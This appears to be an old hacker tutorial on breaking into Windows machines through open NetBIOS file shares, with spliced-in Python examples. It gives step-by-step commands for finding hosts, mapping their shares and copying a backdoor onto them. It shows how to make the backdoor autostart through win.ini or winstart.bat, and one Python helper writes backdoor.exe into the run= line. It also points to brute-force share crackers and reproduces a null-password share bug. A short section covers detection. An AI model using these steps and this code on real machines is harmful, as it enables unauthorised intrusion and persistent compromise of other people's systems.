Introduction
Remember that I won't go into much detail, because it could get too complicated to explain to newbies. This is a newbies guide after all. If you want more detailed information about file sharing, search the web or read a good book on NT network administration.
Windows has an option called File and Print Sharing. You can use it to "share" drives and printers, which means giving other people access to your files and printers - people on your own network, specific IPs or even the whole world. When you turn this option on, you leave an open port (TCP port 139) that accepts connections and speaks NetBIOS over TCP/IP, the "language" (a set of commands, carried inside NetBIOS sessions) used to talk to remote file and print servers, so that other computers can reach the files or printers you decided to share.
In a small company LAN this can be extremely useful. For example, instead of having a separate printer for each computer, there is one central printer attached to a computer that has file and print sharing turned on.
But if you use file sharing on your home computer (we've seen many people who have this option turned on and don't even know what it means! Poor souls) and that computer is connected to the Internet, it can be quite dangerous, because anyone who knows your IP can get at the files and printers you're sharing.
If you don't know whether file sharing is active on your computer, open the Control Panel and select the Network icon. You should see a box listing all the network software you have installed, such as TCP/IP (Transmission Control Protocol / Internet Protocol, the protocol used to carry data packets over the Internet. A protocol is like a human language: if two computers understand it, they can communicate) and probably a Dial-Up Adapter (so you can carry TCP/IP packets over a PPP connection; PPP, Point-to-Point Protocol, is the protocol used on dial-up links). Check whether there is a line called File and Printer Sharing.
If there is, sharing is installed. To turn it off, click the File and Print Sharing button, uncheck "I want to be able to give others access to my files" and do the same for the printer checkbox. Let's get back to the ports. Remember port 139? That is the file sharing port, called the NetBIOS Session Service port (TCP). With this option enabled you also have two other ports open, but they use UDP instead of TCP: 137 (Name Service) and 138 (Datagram Service).
Now, if you know anything about DoS attacks (known to many as nukes), port 139 should sound familiar. There is a kind of DoS (Denial of Service) attack called the OOB nuke (OOB stands for Out Of Band), or "winnuke", that sends a TCP packet carrying out-of-band (URG) data to port 139; unpatched Windows 95 and NT 4.0 boxes lose their network connection and drop to a blue screen. If you want to know more about DoS attacks, wait for the DoS attacks tutorial (it didn't exist when this tutorial was written, but by the time you read this it may be available at http://blacksun.box.sk).
Okay, enough said, let's get on with it.
----------- Getting In -----------
I'm going to explain two ways of breaking into a Windows box that has file sharing enabled. Just to show how unsafe Windows is, the programs you need come with Windows. Isn't that ironic? Well, of course they come with Windows! Would you expect Microsoft to release an OS that supports sharing without the tools to access shares?
You can, of course, also get at file and print shares from Unix; we'll get to that at the end (Appendix A). Right now we're dealing with Windows. Both ways start the same, but in one you keep typing commands and in the other you use a GUI (for the people who don't know, Graphical User Interface) program. The programs you need are nbtstat.exe and net.exe, found in the Windows directory. They run from the MS-DOS prompt; for the help screen type nbtstat /? or net /?. If you are using Windows 95, the option NetBIOS over TCP/IP may be disabled, and with it disabled nbtstat won't work and prints an error like "Failed to access NBT driver" (without the quotes). If you see this, go to the Control Panel, select the Network icon, select TCP/IP and choose Properties; in the TCP/IP properties box select the NetBIOS tab and enable it by ticking the checkbox that isn't ticked.
On Windows 98 you shouldn't see that error unless you have some kind of port blocker on port 139 (such as NukeNabber). A lot of people run these to detect OOB nuke attempts (usually newbies who can't use a firewall or lamers who never tried. Hopefully not you). You're probably thinking that enabling NetBIOS over TCP/IP opens on your own machine the same three ports you use to get into other computers. That's true: to speak the protocol you have to use its default ports. The alternative is to connect to port 139 with a terminal emulator and type the protocol by hand instead of using the programs I mentioned, but that is a real pain. Remember that having the ports open is not the same as having file sharing enabled: you haven't enabled sharing, you've just got the ports open, so the only thing you're exposed to is the DoS attack (use a firewall, or get the OOB patch at www.theargon.com under "defenses"; I don't know whether a port blocker would also drop the replies coming back from the host you're trying to get into).
Now that you have nbtstat.exe ready to roll, choose the target computer. You can use the hostname or the IP, but they need different switches (more on that in a second). Let's suppose this computer's hostname is Mycomputer.MyIsp.com and its IP is 194.65.34.3. The first thing you need to do is see whether the computer has file sharing enabled. Easy. Type:
nbtstat -a hostname
In this case nbtstat -a Mycomputer.MyIsp.com. If you want to use the IP you need to type:
nbtstat -A IP
In this case nbtstat -A 194.65.34.3
That's strange, because DOS isn't case sensitive... but that's how it works: DOS doesn't care about the case of the command name, but nbtstat parses its own switches and treats -a (name) and -A (address) differently. Under the hood both send a NetBIOS "node status" query to UDP port 137 of the target and print the names it has registered. You can get two kinds of reply. One just says "Host not found." If you get this, give up on that computer's shares: either it doesn't have NetBIOS over TCP/IP enabled (or UDP 137 is blocked on the way), or you mistyped the hostname or IP. On the other hand, if you get a table with names, types and status, it might be your lucky day! With that table you're halfway in. But remember that sometimes you get the table and still can't do anything useful with it, because the computer isn't sharing anything (or every share has a password, see Appendix C).
The table should look something like this:
    Name                Type         Status
    -------------------------------------------
    Host          <20>  UNIQUE       Registered
    Hostbug       <00>  GROUP        Registered
    Host machine  <03>  UNIQUE       Registered
If you want to see your own name table just type:
nbtstat -n
The values in the angle brackets (shown in hex) can be:
00  base computer name (UNIQUE) or workgroup/domain name (GROUP); also what "*" queries return
01  master browser, in the magic __MSBROWSE__ name
03  messenger/alerter service; also the name of the logged-in user  <--- this one is cool too
20  server service, i.e. the machine is sharing resources  <--- check this one
1B  domain master browser name
1C  domain controller name
1E  domain/workgroup master browser election announcement
I'll talk about messaging/alert service later, if you want
to read about it now, just scroll down until you find
Messaging/Alert Service.
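What nbtstat -a/-A actually puts on the wire is a NetBIOS node status request to UDP port 137, and the table it prints is the name list in the reply. The following Python is an added example (not part of the original tutorial and not Microsoft's code) that builds that request, parses a reply into the same name/type/status rows, and flags the <20> server-service name the text tells you to look for. The reply bytes are constructed for the example, with the trailing statistics block cut down to the MAC address; query_host() is the only part that touches the network, and 194.65.34.3 is the tutorial's made-up target.

```python
import socket
import struct

# NetBIOS name suffixes, the <xx> column nbtstat prints (same table as above).
SUFFIXES = {
    0x00: "workstation / workgroup name",
    0x01: "master browser (__MSBROWSE__)",
    0x03: "messenger service / logged-in user",
    0x1B: "domain master browser",
    0x1C: "domain controller",
    0x1E: "browser election",
    0x20: "server service (file and print sharing)",
}
NBSTAT = 0x0021     # question/answer type of a node status request, RFC 1002
CLASS_IN = 0x0001


def encode_name(raw16: bytes) -> bytes:
    """First-level encoding: every byte becomes two letters A..P, packed into
    one 32-character label with a length byte in front and a zero byte after."""
    if len(raw16) != 16:
        raise ValueError("a NetBIOS name is exactly 16 bytes before encoding")
    body = bytearray()
    for b in raw16:
        body += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return bytes([32]) + bytes(body) + b"\x00"


def build_node_status_query(txid: int = 0x1234) -> bytes:
    """The datagram nbtstat -A sends: a query for the wildcard name '*' of type NBSTAT."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # flags 0: plain query, QDCOUNT 1
    wildcard = b"*" + b"\x00" * 15                            # '*' padded with NULs, not spaces
    return header + encode_name(wildcard) + struct.pack(">HH", NBSTAT, CLASS_IN)


def parse_node_status_response(data: bytes) -> dict:
    """Turn a node status reply into the rows nbtstat prints plus the adapter MAC."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not an NBT response carrying an answer")
    off = 12
    while data[off] != 0:            # skip the echoed RR_NAME labels
        off += 1 + data[off]
    off += 1
    rtype, _rclass, _ttl, _rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("answer is not a node status record")
    count = data[off]
    off += 1
    names = []
    for _ in range(count):
        raw, suffix, nflags = struct.unpack(">15sBH", data[off:off + 18])
        off += 18
        names.append({
            "name": raw.rstrip(b" \x00").decode("ascii", "replace"),
            "suffix": suffix,
            "type": "GROUP" if nflags & 0x8000 else "UNIQUE",                         # G bit
            "status": "Registered" if nflags & 0x0400 else "Conflict/Deregistering",  # ACT bit
            "service": SUFFIXES.get(suffix, "unknown"),
        })
    mac = ":".join(f"{b:02X}" for b in data[off:off + 6])   # UNIT_ID opens the statistics block
    return {"txid": txid, "names": names, "mac": mac}


def shares_server(names) -> bool:
    """True when the host registers a UNIQUE <20> name, i.e. the server service behind TCP 139 is up."""
    return any(n["suffix"] == 0x20 and n["type"] == "UNIQUE" for n in names)


def query_host(ip: str, timeout: float = 2.0):
    """Send the query to UDP/137 of one host; None means 'Host not found' (no answer)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_query(), (ip, 137))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return None
    return parse_node_status_response(data)


def _entry(name: str, suffix: int, group: bool = False) -> bytes:
    # One NODE_NAME record: 15-byte padded name, suffix byte, NAME_FLAGS (ACT set = registered)
    return name.ljust(15).encode() + bytes([suffix]) + struct.pack(">H", (0x8000 if group else 0) | 0x0400)


# Constructed sample reply, as a machine HOST in workgroup HOSTBUG would answer
# (statistics block cut down to the 6-byte MAC; the parser reads no further).
SAMPLE_REPLY = (
    struct.pack(">HHHHHH", 0x1234, 0x8400, 0, 1, 0, 0)        # response, authoritative, 1 answer
    + encode_name(b"*" + b"\x00" * 15)
    + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, 1 + 3 * 18 + 6)
    + bytes([3])
    + _entry("HOST", 0x00) + _entry("HOSTBUG", 0x00, group=True) + _entry("HOST", 0x20)
    + bytes.fromhex("00A0C9123456")
)

if __name__ == "__main__":
    import sys
    reply = query_host(sys.argv[1]) if len(sys.argv) > 1 else parse_node_status_response(SAMPLE_REPLY)
    if reply is None:
        print("Host not found.")
    else:
        for n in reply["names"]:
            print(f"{n['name']:<16} <{n['suffix']:02X}>  {n['type']:<7} {n['status']}  {n['service']}")
        print("MAC", reply["mac"], "| sharing:", shares_server(reply["names"]))
```

Run it with no argument to see the constructed table, or with an IP (for example 194.65.34.3 from the text) to send the real query; a timeout is reported as "Host not found.", which is exactly the case where nbtstat gives up.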
So if there is a <20> entry, the server service is running and the machine may be sharing something. Now how does someone get in? First you can create an entry in your Lmhosts file (c:\windows\Lmhosts, yes, no extension; there is also a sample file c:\windows\Lmhosts.sam, but that is not the file you should edit. On Windows NT the files are c:\WinNT\Lmhosts and c:\WinNT\Lmhosts.sam). If you don't have an Lmhosts file, just create it. The entry maps the target's IP to its NetBIOS computer name, which is what the GUI method below needs; the net use command and the Run box accept the raw IP, so for those you can skip this step. Read the information in the sample file below before you edit.
--- Lmhosts.sam file ---
# Copyright (c) 1993-1995 Microsoft Corp.
#
# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows NT.
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the computername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
#      #PRE
#      #DOM:<domain>
#      #INCLUDE <filename>
#      #BEGIN_ALTERNATE
#      #END_ALTERNATE
#      \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:<domain>" tag will associate the
# entry with the domain specified by <domain>. This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The <domain> is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE <filename>" will force the RFC NetBIOS (NBT)
# software to seek the specified <filename> and parse it as if it were
# local. <filename> is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addition the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97     rhino                   #PRE #DOM:networking  #net group's DC
# 102.54.94.102    "appname        \0x14"                        #special app server
# 102.54.94.123    popular                 #PRE                  #source server
# 102.54.94.117    localsrv                #PRE                  #needed for the include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.
To create an entry, open the Lmhosts file in a plain text editor (Notepad, not a word processor, which would add formatting), type the target's IP, press Tab and type the target's NetBIOS computer name: the UNIQUE <00>/<20> name from the nbtstat table, at most 15 characters, not the share name. Save the file and exit. Now there are two ways to get at the remote shares you're after: the easy way and the cool way.
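Lmhosts is a simple format, but the quoting and directive rules in the sample file above are where entries go wrong. The following Python is an added example (not part of the original tutorial and not Microsoft's resolver) that parses Lmhosts lines the way the sample file describes them (#PRE, #DOM:, quoted names with \0xnn suffixes, trailing comments), performs the lookup a Windows client falls back to, and builds the one line this step asks you to add. The sample text is constructed; 194.65.34.3 and MYCOMPUTER are the tutorial's made-up target, and #INCLUDE groups are deliberately not followed.

```python
import ipaddress
import re

ESCAPE = re.compile(r"\\0x([0-9A-Fa-f]{2})")   # the \0xnn notation from the sample file


def decode_quoted_name(text: str):
    """Quoted LMHOSTS names are taken literally: spaces are kept and \\0xnn becomes
    one raw byte. Windows does not pad quoted names, so to set a suffix the \\0xnn
    must be the 16th character. Returns (15-byte name, suffix or None)."""
    raw = ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text).encode("latin-1")
    if len(raw) > 16:
        raise ValueError("NetBIOS names are at most 16 bytes")
    if len(raw) == 16:
        return raw[:15], raw[15]
    return raw.ljust(15, b" "), None


def parse_lmhosts(text: str) -> list:
    """Parse LMHOSTS into dicts. Every line starting with '#' is skipped, which
    also drops #INCLUDE / #BEGIN_ALTERNATE blocks (they are not fetched here)."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r'(\S+)\s+("[^"]*"|\S+)(.*)$', line)
        if not m:
            raise ValueError(f"line {lineno}: expected <IP> <name>")
        ip_text, name_text, rest = m.groups()
        ip = str(ipaddress.IPv4Address(ip_text))          # rejects garbage like 'rhino.local'
        if name_text.startswith('"'):
            name, suffix = decode_quoted_name(name_text[1:-1])
        else:
            if len(name_text) > 15:
                raise ValueError(f"line {lineno}: name longer than 15 characters")
            name, suffix = name_text.upper().ljust(15).encode("ascii"), None   # matches any suffix
        preload, domain = False, None
        for tok in rest.split():
            up = tok.upper()
            if up == "#PRE":
                preload = True
            elif up.startswith("#DOM:"):
                domain = tok[5:]
            elif tok.startswith("#"):
                break                                      # trailing comment
            else:
                raise ValueError(f"line {lineno}: unexpected token {tok!r}")
        entries.append({"ip": ip, "name": name, "suffix": suffix,
                        "preload": preload, "domain": domain, "line": lineno})
    return entries


def lookup(entries: list, name: str, suffix=None):
    """What the resolver does after WINS/broadcast fail: the first matching entry wins."""
    want = name.upper().ljust(15).encode("ascii")
    for e in entries:
        if e["name"].upper() == want and (e["suffix"] is None or suffix is None or e["suffix"] == suffix):
            return e["ip"]
    return None


def format_entry(ip: str, name: str, preload: bool = False, domain: str = None) -> str:
    """Build the line the tutorial asks you to add: IP, a tab, the NetBIOS computer name."""
    ipaddress.IPv4Address(ip)                               # raises on a bad address
    # Legal NetBIOS name characters, minus '#' (it would start a comment in this file)
    if not name or len(name) > 15 or not re.fullmatch(r"[A-Za-z0-9!@$%^&()\-_'{}.~]+", name):
        raise ValueError("NetBIOS computer names are 1-15 characters, no spaces or backslashes")
    line = f"{ip}\t{name.upper()}"
    if preload:
        line += " #PRE"
    if domain:
        line += f" #DOM:{domain}"
    return line


# Constructed sample: the example lines from the .sam file above plus the tutorial's target.
SAMPLE_LMHOSTS = """\
# constructed sample, not a real file
102.54.94.97     rhino                   #PRE #DOM:networking  #net group's DC
102.54.94.102    "appname        \\0x14"                        #special app server
102.54.94.123    popular                 #PRE                  #source server
194.65.34.3      MYCOMPUTER
"""

if __name__ == "__main__":
    for e in parse_lmhosts(SAMPLE_LMHOSTS):
        print(e["ip"], e["name"], e["suffix"], "PRE" if e["preload"] else "", e["domain"] or "")
    print(format_entry("194.65.34.3", "Mycomputer"))
```

Note that the quoted "appname" entry is padded to 15 characters before the \0x14 on purpose; an unpadded `"appname \0x14"` would register the wrong suffix on a real Windows box.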
--- The easy way (GUI) ---
If you don't want any more trouble, click Start, then Find, then Computer. Enter the target's computer name (or its IP address). If your Lmhosts entry is correct, the computer shows up in the search window. Double-click the computer icon and browse its shares as if they were on your own computer.
--- The cool way ---
Now it's time to get to know net.exe. For the help screen type (in a DOS window):
net /?
I suggest redirecting the help to a file and reading it there (net /? > somefile.txt writes the output to somefile.txt, overwriting it; net /? >> somefile.txt appends to it without deleting what is there). You can also type net option /? to get help on one option. To access a share, you map it to a virtual drive letter on your machine:
net use drive \\[ipaddress]\[sharename]
Where:
drive is the drive letter you want, for example f: g: z:
ipaddress is the target host's IP
sharename is the name of one of the target's shares (the nbtstat table only tells you the server service is running; the net view command, which you can see in Appendix F, lists the share names)
After this you just type drive: and browse the new drive from MS-DOS as if it were your own hard disk (for example, type f: if your new virtual drive was assigned the letter f).
Example:
Let's say you coded a *really cool* backdoor and you want to run it on a computer that has sharing enabled; the share name is Flintstone and the IP address is 145.42.23.14.
c:\>net use f: \\145.42.23.14\Flintstone
Now you just need to copy the backdoor to the new virtual drive.
c:\>copy backdoor.exe f:\backdoor.exe
----- First Version Text ------
Then you would just change drive and run the backdoor.
c:\>f:
f:\>backdoor.exe
And the backdoor is loaded, so now you can use it to access this computer.
--------------------------------------------------------------------------------
I'm deeply sorry, but what is written between the ----First Version Text--- markers is wrong. Running f:\backdoor.exe starts the program on your own computer (the file is only read over the network), not on the target host. Thanks to Kimmo from the a-Men Group for correcting me. What you really need to do is copy backdoor.exe to the share and then make the target start it itself, for example by editing its win.ini (the [windows] section) and adding the line:
run=%SystemRoot%\backdoor.exe
--------------------------------------------------------------------------------
NOTE: Why %SystemRoot%?
We use %SystemRoot% instead of F: because F: is a virtual drive that exists only on your machine; on the target that letter may not exist at all. %SystemRoot% (on NT; the Windows 9x equivalent is %windir%) names the Windows directory, which is where win.ini lives. Two caveats: the copied file lands in the share's root on the target (if the share is the whole C: drive, f:\backdoor.exe is c:\backdoor.exe, not a file in the Windows directory), so the path in run= has to be where the file really is on the target; and it is not guaranteed that the run= line expands environment variables, so the safest choice is the plain local path, such as c:\windows\backdoor.exe. All of this requires a writable share that covers the Windows directory, and the program only starts the next time someone logs on to the target.
Of course, you can also put the backdoor in other places, such as c:\windows\winstart.bat (add the line %SystemRoot%\backdoor.exe, again preferably as a plain path, on a line of its own). If there is no such file, create it. winstart.bat is only honoured by Windows 9x, which runs it once at startup before the GUI loads.
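The win.ini edit above is fragile for two reasons the text doesn't spell out: the INI reader only returns the first run= line in [windows], so a second one is silently ignored, and the programs on that line are separated by spaces, so a path containing a space is read as two programs. The following Python is an added example, not part of the original tutorial, that reads what run= and load= will start (the audit a defender wants after reading Appendix D) and adds a program to run= without duplicating the line. The win.ini text is a constructed sample, and the separator rule is an assumption noted in the code.

```python
import re

SECTION = re.compile(r"^\s*\[([^\]]+)\]\s*$")
# Assumption: programs in run=/load= are separated by spaces (commas also appear in
# the wild), which is why 8.3 paths without spaces are the only safe ones here.
SEPARATOR = re.compile(r"[,\s]+")


def _windows_section(lines):
    """Yield (index, line) for every line inside the [windows] section."""
    inside = False
    for i, line in enumerate(lines):
        m = SECTION.match(line)
        if m:
            inside = m.group(1).lower() == "windows"
            continue
        if inside:
            yield i, line


def autostart_entries(win_ini: str) -> dict:
    """Audit helper: everything the [windows] run= and load= keys will start at logon."""
    found = {"run": [], "load": []}
    for _, line in _windows_section(win_ini.splitlines()):
        if line.lstrip().startswith(";"):                   # commented-out line
            continue
        key, sep, value = line.partition("=")
        key = key.strip().lower()
        if sep and key in found:
            found[key].extend(p for p in SEPARATOR.split(value.strip()) if p)
    return found


def add_run_entry(win_ini: str, command: str) -> str:
    """Return the win.ini text with `command` added to run= in [windows].
    An existing run= line is extended rather than duplicated (only the first one
    counts), and the [windows] section is created if it is missing."""
    lines = win_ini.splitlines()
    for i, line in _windows_section(lines):
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "run":
            programs = [p for p in SEPARATOR.split(value.strip()) if p]
            if command.lower() in (p.lower() for p in programs):
                return win_ini                              # already there, leave the file alone
            lines[i] = "run=" + " ".join(programs + [command])
            break
    else:
        for i, line in enumerate(lines):
            m = SECTION.match(line)
            if m and m.group(1).lower() == "windows":
                lines.insert(i + 1, "run=" + command)       # right under the section header
                break
        else:
            lines = ["[windows]", "run=" + command] + lines  # no [windows] section at all
    return "\r\n".join(lines) + "\r\n"                       # win.ini is a CRLF text file


# Constructed sample win.ini, not taken from any real machine.
SAMPLE_WIN_INI = """\
; constructed sample win.ini
[windows]
load=
run=C:\\SCANNER\\SCAN32.EXE
NullPort=None
[Desktop]
Wallpaper=(None)
"""

if __name__ == "__main__":
    print("before:", autostart_entries(SAMPLE_WIN_INI))
    updated = add_run_entry(SAMPLE_WIN_INI, "c:\\windows\\backdoor.exe")
    print("after: ", autostart_entries(updated))
```

For the audit, feed autostart_entries() the real c:\windows\win.ini and compare the list with what you expect to be there; an unfamiliar program on run= or load= is exactly the trace the method above leaves.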
Messaging/Alert Service
What's this feature? It doesn't get you at the files, but it's kind of fun: it sends a message, in message-box format, to the other host. Watch the face of the guy at that computer when he sees a message box saying "Error: User Too Stupid". Remember that your computer name is shown in the message box as the sender, so you can only have a good laugh with this if you spoof it. When using this feature you also need an entry for the target in your Lmhosts file. This is mostly something for a LAN, such as a school LAN with your friends, just to see their faces, nothing more. A message sent to a workgroup name goes out as a broadcast, and routers don't forward broadcasts (for security reasons, off the topic of this tutorial), so those never leave your LAN; a message to a single computer name that your Lmhosts file resolves to an IP is sent directly to that IP (UDP port 138) and can travel further.
To send a message, the other computer needs to have a <03> name registered. As you can see in the table earlier in the file, <03> is:
03  messenger/alerter service; also the name of the logged-in user  <--- this one is cool too
So if your target has this turned on, you can send a message by typing:
net send computername message
(computername is the <03> name; the user name listed under <03> also works and reaches that user). If you are on a LAN and don't want people messing with you, type:
net stop messenger
This stops the messenger service, so you can neither send nor receive messages with net send. To enable it again, type:
net start messenger
Now you'll be able to send and receive messages again.
Appendix A: Accessing Windows shares from Unix
The easiest way is an X Window program called LinNeighborhood, which can be downloaded from http://www.bnro.de/~schmidjo/. You can also do it from the console or an xterm with the Samba client tools. To learn more, read the man pages of the following commands:
smbclient   (an ftp-like client for shares; it can also list the shares a host offers)
smbmnt
smbmount    (mount a share into your filesystem)
smbprint
smbumount
Appendix B: Finding sharing hosts
Suppose you're an admin who wants to scan his network for vulnerable hosts. Or suppose you're a bored cracker who wants to find possible targets. In both cases you want a share scanner to do the job: it sends the same name query nbtstat -A sends to every address in a subnet and reports the hosts that answer with a <20> name. Get Legion or NbtScan from packetstorm.securify.com.
Appendix C: Password-protected shares
Are you an admin who wants to test how strong his password-protected shares are? Are you a cracker who came across a password-protected share and doesn't know what to do? You could get a brute-force share password cracker that tries passwords until it finds the right one. Cain is one such program, and it has some other features you might want to check out.
Appendix D: Detecting sharing attacks
Sharing attacks are usually pretty easy to detect (unless the attacker spoofs, or works from another host he already owns, so that host looks like the attacker): they show up as name queries on UDP port 137 and connections to TCP port 139 from addresses that have no business talking to you. The simplest program for the job is Lockdown 2000 (from www.lockdown.com), but it is quite buggy and doesn't always perform well. You can also try Norton AtGuard (www.norton.com); I believe it can detect sharing attacks too, although I haven't tested it yet. If you're going for the real thing, get a good firewall or intrusion detection system. My personal favourite on Unix is ipchains (a packet filter; search linux.box.sk, freshmeat.net or any of your other favourites), and on Windows I recommend Firewall-1 (search the net, you should come across it pretty quickly). Whatever you use, the rule is simple: don't let ports 137, 138 and 139 reach the Internet unless you really mean to share with the world.
Appendix E: An easier way to access shares
Got the target's IP address? Good. Got the share name? Good. Now hit Start, then Run, and type the UNC path:
\\ip-address(or hostname)\sharename
For example: \\65.4.78.203\someshare
(the forward-slash form //65.4.78.203/someshare is accepted in the Run box too). You get an interface like the one you get when you double-click the "My Computer" icon, without needing to assign a virtual drive.
Appendix F: Breaking Password-Protected Shares Without
Brute-Forcing
The following was pasted from the Keen Veracity e-zine,
volume 9:
[More Bugs In Windows NT]
===============================================[Ntwak0]
Subject: Password problem in NT when connecting to a share. Should I say you do not need a password in some cases even if it is protected, I mean :)
Monday, December 27, 1999 by NtWaK0
Tested on NT 4.0 + SP6 + SP6a.
I will try to do it by example; in this case you will be able to repeat it.
--> I am going to map a network share, call it X:
E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
The command completed successfully.
--> I did net view to see the shared resources
E:\Tmp>net view \\1.1.1.1
Shared resources at \\1.1.1.1
Share name   Type   Used as   Comment
Tmp          Disk   X:
The command completed successfully.
--> Now I copied a file to X: to use the 1.1.1.1 resources.
E:\Tmp>copy test.txt x:
        1 file(s) copied.
--> Now I delete the connection I created to 1.1.1.1 using X:
E:\Tmp>net use /delete x:
x: was deleted successfully.
--> Now I tried to recreate the connection using a NULL password, just for fun
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
E:\Tmp>
--> It is normal that I could not log in. Now I did:
The Bug:
--> Now reconnect using the command line
E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
The command completed successfully.
--> I used Explorer to copy the same file test.txt from my drive E:\tmp to the mapped drive X:
--> I got a message saying "The file already exists, do you want to overwrite it?" I said yes; well, it is normal, I did copy it before as you saw in the step above.
--> After copying the file in Explorer I right-clicked on X: (the mapped drive) and chose Disconnect
--> I got a message box saying "There are currently files open on X: (connected to \\1.1.1.1\tmp). If you do close the files before disconnecting from the network, data may be lost. Do you want to disconnect the device anyway?"
Then I clicked Yes; in this case I have no more connection mapped to X:. In this case I should not be able to connect without password or username, but not true ;)
--> Next, I do not know why I tried it, I guess for fun, in a DOS window I typed
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
The command completed successfully.
--> W00t, I was able to log in, I did not believe it, hehe, with no password.
--> To make sure I was not dreaming or missing sleep, I was able to repeat it like 10 times.
But if you connect and disconnect using net use /delete x: this will work and you cannot connect with no password like in the Explorer case.
So this is a security bug that you can reproduce in Explorer and the DOS command, and it has to follow certain steps. What do I mean by that? Well, you have to disconnect using Explorer, and when you get the message saying "There are currently files open on X: (connected to \\1.1.1.1\tmp) blah blah...", in that case, if you disconnect and reconnect right after using no password, that should work. ;) But if you do it all from the command line this should not work, and that is normal.
Here is an example done all by command line:
E:\Tmp>net use x: \\1.1.1.1\tmp " q]a'z/ " /user:ntwak0
The command completed successfully.
E:\Tmp>copy test.txt x:test.txt
        1 file(s) copied.
E:\Tmp>net use /delete x:
x: was deleted successfully.
E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
E:\Tmp>
Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
"The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and I'm not even too sure about that one" -- Dennis Hughes, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)
Credits
Written by R A V E N <barakirs@netvision.net.il>
Thanks to Oggy, a totally kewl and helpful guy who helped us release this tutorial faster.
Version 1.3, 4/2/2000